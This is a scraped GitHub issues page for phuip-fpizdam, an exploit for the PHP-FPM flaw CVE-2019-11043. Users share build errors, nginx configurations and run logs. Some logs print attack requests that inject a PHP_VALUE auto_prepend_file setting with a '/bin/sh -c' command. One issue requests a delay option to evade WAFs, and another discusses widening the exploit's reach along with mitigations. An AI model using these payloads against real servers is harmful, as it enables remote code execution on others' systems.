neex / phuip-fpizdam Goto Github PK
View Code? Open in Web Editor NEWExploit for CVE-2019-11043
License: MIT License
Exploit for CVE-2019-11043
License: MIT License
phuip-fpizdam/requester.go
cl: &http.Client{
Transport: &http.Transport{
DisableCompression: true, // No "Accept-Encoding"
TLSNextProto: nextProto, // No http2
Proxy: http.ProxyFromEnvironment,
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
},
Timeout: 30 * time.Second,
CheckRedirect: disableRedirects, // No redirects
},
maybe you can add TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
Otherwise, it will appear Q: x509: cannot validate certificate for x.x.x.x because it doesn't contain any IP SANs
go run main.go
.\main.go:22:19: undefined: AttackParams
.\main.go:31:13: undefined: Methods
.\main.go:36:22: undefined: NewRequester
.\main.go:51:15: undefined: SetSetting
.\main.go:70:15: undefined: KillWorkers
.\main.go:84:19: undefined: Detect
.\main.go:86:16: undefined: errPisosBruteForbidden
.\main.go:105:14: undefined: Attack
go version go1.6.2 linux/amd64
Ubuntu 16.04.5 LTS
$ go get github.com/neex/phuip-fpizdam
go/src/github.com/neex/phuip-fpizdam/requester.go:30: undefined: http.ErrUseLastResponse
Seems like the SCRIPT_FILENAME also has to be filled from the split info. If the SCRIPT_FILENAME is pointing to a fixed file the exploit is not working.
E.g.:
fastcgi_param SCRIPT_FILENAME $document_root/script.php
Used for example in FaaS installs. Also the reproducer is not reliable building a vulnerable container. Would be better to point to a vulnerable tag
If fastcgi_param PATH_INFO $fastcgi_path_info;
is set before fastcgi_param REQUEST_URI $request_uri;
the exploit no longer finds qsl candidates.
To test it, just comment the line fastcgi_param REQUEST_URI $request_uri;
from /etc/nginx/fastcgi_params and add it after PATH_INFO in /etc/nginx/sites-enabled/default:
include fastcgi_params;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
fastcgi_param PATH_INFO $fastcgi_path_info;
fastcgi_param PATH_TRANSLATED $document_root$fastcgi_path_info;
fastcgi_param REQUEST_URI $request_uri;
PHP 7.0.10 (cli) (built: Jun 25 2019 16:55:30) ( NTS )
nginx version: nginx/1.16.0
server {
listen 8080;
root /var/www/test;
location ~ [^/].php(/|$) {
fastcgi_split_path_info ^(.+?.php)(/.*)$;
include fastcgi_params;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
fastcgi_param PATH_INFO $fastcgi_path_info;
fastcgi_param PATH_TRANSLATED $document_root$fastcgi_path_info;
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
}
}
but, when i run ./phuip-fpizdam "http://127.0.0.1:8080/index.php"
result:
2019/10/29 14:59:44 Base status code is 200
2019/10/29 14:59:44 Detect() returned error: no qsl candidates found, invulnerable or something wrong
go install github.com/neex/phuip-fpizdam
# github.com/neex/phuip-fpizdam
/home/golang/src/github.com/neex/phuip-fpizdam/main.go:47:23: constant 4294967296 overflows int
go version go1.13.3 linux/amd64
Ho to run you sh*t?
I can't check any PHP file. Always base status code is 404.
Waste my time.
The flag will redirect the messages from the default stdin/out to logfile. This would give you the flexibility to review all messages at a later time. (use case example: large scan at night).
I have this implemented in my fork you can use as the quick reference. Just my 2 cents. Thank you.
https://github.com/yangsec888/phuip-fpizdam/blob/master/main.go
Using the following command
$: go get github.com/neex/phuip-fpizdam
I get the following error
go/src/github.com/neex/phuip-fpizdam/requester.go:31: undefined: http.ErrUseLastResponse
After the attack paras were found exploit freezes and aborts if the connection is interrupted
2019/10/25 11:02:48 Using attack params --qsl 1740 --pisos 7 --skip-detect
2019/10/25 11:02:48 Performing attack using php.ini settings...
2019/10/26 10:24:16 Attack returned error: Get https://server.tld/index.php/PHP_VALUE%0Aauto_prepend_file=a;;;;?a=/bin/sh+-c+'which+which'&QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
Inquiring Romanian speakers want to know...
when run the exp, fpm shows
error: Passing INI directive through FastCGI: unable to set 'session.auto_start'
whats wrong with that?
Hi,
I've been trying to use your PoC against an Nginx vhost that contains this snippet:
location ^~ /foobar {
alias /var/www/foobar;
location ~ ^(?<prefix>/foobar)(?<phpfile>.+?\.php)(?<pathinfo>/.*)?$ {
fastcgi_split_path_info ^(.+?\.php)(/.+)$;
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
include /etc/nginx/fastcgi_params;
fastcgi_param SCRIPT_FILENAME $document_root$phpfile;
fastcgi_param PATH_INFO $pathinfo if_not_empty;
}
}
I can't seem to reproduce it hitting http://example.com/foobar/index.php or http://example.com/foobar/module.php/modules/index.php (there are PHP files in both these locations). All my attempts yield an Nginx 404. There is no try_files
within this location
block.
Would you agree that the above is somehow not exploitable? I am not sure why, wondering if it's because of the use of the $pathinfo if_not_empty
instead of $fastcgi_path_info
, or perhaps it's the location regex?
P.S the /etc/nginx/fastcgi_params
that gets included, looks like this. Note there is a PATH_INFO in there too but I think it gets overwritten by the subsequent fastcgi_param PATH_INFO $pathinfo if_not_empty
in the location block?
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
fastcgi_param QUERY_STRING $query_string;
fastcgi_param REQUEST_METHOD $request_method;
fastcgi_param CONTENT_TYPE $content_type;
fastcgi_param CONTENT_LENGTH $content_length;
fastcgi_param SCRIPT_NAME $fastcgi_script_name;
fastcgi_param REQUEST_URI $request_uri;
fastcgi_param DOCUMENT_URI $document_uri;
fastcgi_param DOCUMENT_ROOT $document_root;
fastcgi_param SERVER_PROTOCOL $server_protocol;
fastcgi_param GATEWAY_INTERFACE CGI/1.1;
fastcgi_param SERVER_SOFTWARE nginx/$nginx_version;
fastcgi_param REMOTE_ADDR $remote_addr;
fastcgi_param REMOTE_PORT $remote_port;
fastcgi_param SERVER_ADDR $server_addr;
fastcgi_param SERVER_PORT $server_port;
fastcgi_param SERVER_NAME $server_name;
fastcgi_param HTTPS $https if_not_empty;
fastcgi_param HTTP_PROXY "";
fastcgi_param PATH_INFO $fastcgi_path_info;
# PHP only, required if PHP was built with --enable-force-cgi-redirect
fastcgi_param REDIRECT_STATUS 200;
Thanks!
I'm testing this exploit on one of my websites and I am getting those errors.
Can someone explain what are those Or is this website is vulnerable to this attack?
TEST 1
Test site Url 1 https://www.mysite.com/watch_video.php?key=qwsr7d62679z185r0
2019/10/29 16:30:06 Detect() returned error: error while doing first request: Get https://www.mysite.com/watch_video.php/path%0Ainfo.php?QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ: EOF
TEST 2
Test site Url 2 https://www.mysite.com/watch_video.php (without key param)
2019/10/29 16:29:41 Base status code is 200 2019/10/29 16:29:43 Detect() returned error: error for &main.AttackParams{QueryStringLength:1580, PisosLength:1}: Get https://www.mysite.com/watch_video.php/PHP%0Ais_the_shittiest_lang.php?QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ: EOF
.\phuip-fpizdam.exe http://api-local.test.com/index.php
2019/10/24 15:55:51 Base status code is 200
2019/10/24 15:55:52 Detect() returned error: no qsl candidates found, invulnerable or something wrong
Hi !
Thanks for this usefull work.
I built a docker image to easily check URLs for vulnerability :
If you consider it useful, feel free to add it to your documentation.
Thanks.
Adding an option to configure a delay for the HTTP requests so it can evade rate limits or certain WAFs.
When executing go install github.com/neex/phuip-fpizdam
, following error is printed:
$ go install github.com/neex/phuip-fpizdam
can't load package: package github.com/neex/phuip-fpizdam: cannot find package "github.com/neex/phuip-fpizdam" in any of:
/usr/lib/go/src/github.com/neex/phuip-fpizdam (from $GOROOT)
/home/invidian/go/src/github.com/neex/phuip-fpizdam (from $GOPATH)
$ go version
go version go1.13.3 linux/amd64
Just a technical question, our servers are updated :)
We use a splitted enviroment where nginx runs in one container, php-fpm in another. I tried to reproduce the issue with your exploit, but it seems to hang at
2019/11/05 21:30:58 The target is probably vulnerable. Possible QSLs: [1735 1740 1745]
while the project runs localy (8mins now). As i inspect your docker-file, you seem to have your enviroment combined in the same container. If the split we did protected us from the attack anyway, this would be a nice side-info :)
Also, if this is really the case, it would be may a idea to add it to the requirements?
Thanks for developing this poc!
The fastcgi_split_path_info directive must be there ...
It doesn't need to be there, as if it's not there and fastcgi_param PATH_INFO is set to an empty string, the same condition is met.
Currently, our exploit works only when Nginx config is like this:
location ~ [^/]\.php(/|$) {
...
}
I believe that far more popular config snippet is like this:
location ~ \.php$ {
...
}
which allows only URLs that end with .php
(and not just contain .php/
somewhere).
Given location ~ \.php$
, there're two further config options:
try_files $uri =404
into the location section. There's nothing we can do in this case as it forbids access to non-existing files (and we need it). However, this requires php-fpm and Nginx to share their FS, and I believe many DevOps consider this not modern enough..php
. We can win in this case as fastcgi_split_path_info
is still probably here (and it doesn't matter which regexp it uses).However, to improve our exploit for case 2, we need even shorter php.ini options. We have 23 bytes currently and after adding ;.php
to every string we have only 18 left. So there's a research field.
Hi,
Thank you for sharing the vulnerability! I have a quick yes-or-no question.
It includes something like try_files $uri =404 into the location section. There's nothing we can do in this case as it forbids access to non-existing files (and we need it). source
No file existence checks like try_files $uri =404 or if (-f $uri). If Nginx drops requests to non-existing scripts before FastCGI forwarding, our requests never reach php-fpm. Adding this is also the easiest way to patch. source
My config, copied from the default Ubuntu one, contains these lines:
# regex to split $uri to $fastcgi_script_name and $fastcgi_path
fastcgi_split_path_info ^(.+\.php)(/.+)$;
# Check that the PHP script exists before passing it
try_files $fastcgi_script_name =404;
# Bypass the fact that try_files resets $fastcgi_path_info
# see: http://trac.nginx.org/nginx/ticket/321
set $path_info $fastcgi_path_info;
fastcgi_param PATH_INFO $path_info;
So right after it performs the try_files
check, it restores the PATH_INFO
- does that make it vulnerable again?
Is this good or bad?
Base status code is 404
Detect() returned error: no qsl candidates found, invulnerable or something wrong
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.